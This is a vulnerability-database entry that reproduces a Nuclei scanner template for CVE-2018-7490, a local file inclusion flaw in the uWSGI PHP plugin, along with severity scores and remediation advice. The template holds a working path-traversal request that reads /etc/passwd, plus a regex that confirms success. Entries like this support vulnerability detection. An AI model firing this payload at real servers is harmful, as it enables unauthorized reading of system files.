Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7490
HistoryApr 08, 2020 - 11:54 a.m.

uWSGI PHP Plugin Local File Inclusion

2020-04-0811:54:50
ProjectDiscovery
github.com
4

0.954 High

EPSS

Percentile

99.4%

uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.

id: CVE-2018-7490

info:
  name: uWSGI PHP Plugin Local File Inclusion
  author: madrobot
  severity: high
  description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability.
  reference:
    - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
    - https://www.exploit-db.com/exploits/44223/
    - https://www.debian.org/security/2018/dsa-4142
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7490
    - https://github.com/jweny/pocassistdb
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7490
    cwe-id: CWE-22
    epss-score: 0.9541
    epss-percentile: 0.99316
    cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: unbit
    product: uwsgi
  tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bbd41fe42f4d67481791495e653884936a3e147f7a77321eaae6e16881c8ce50022062c103f4cb20c78f1ad7cbce762bac10fc1b2b1c53d2bc89c43b92e983aa2f95:922c64590222798bb761d5b6d8e72950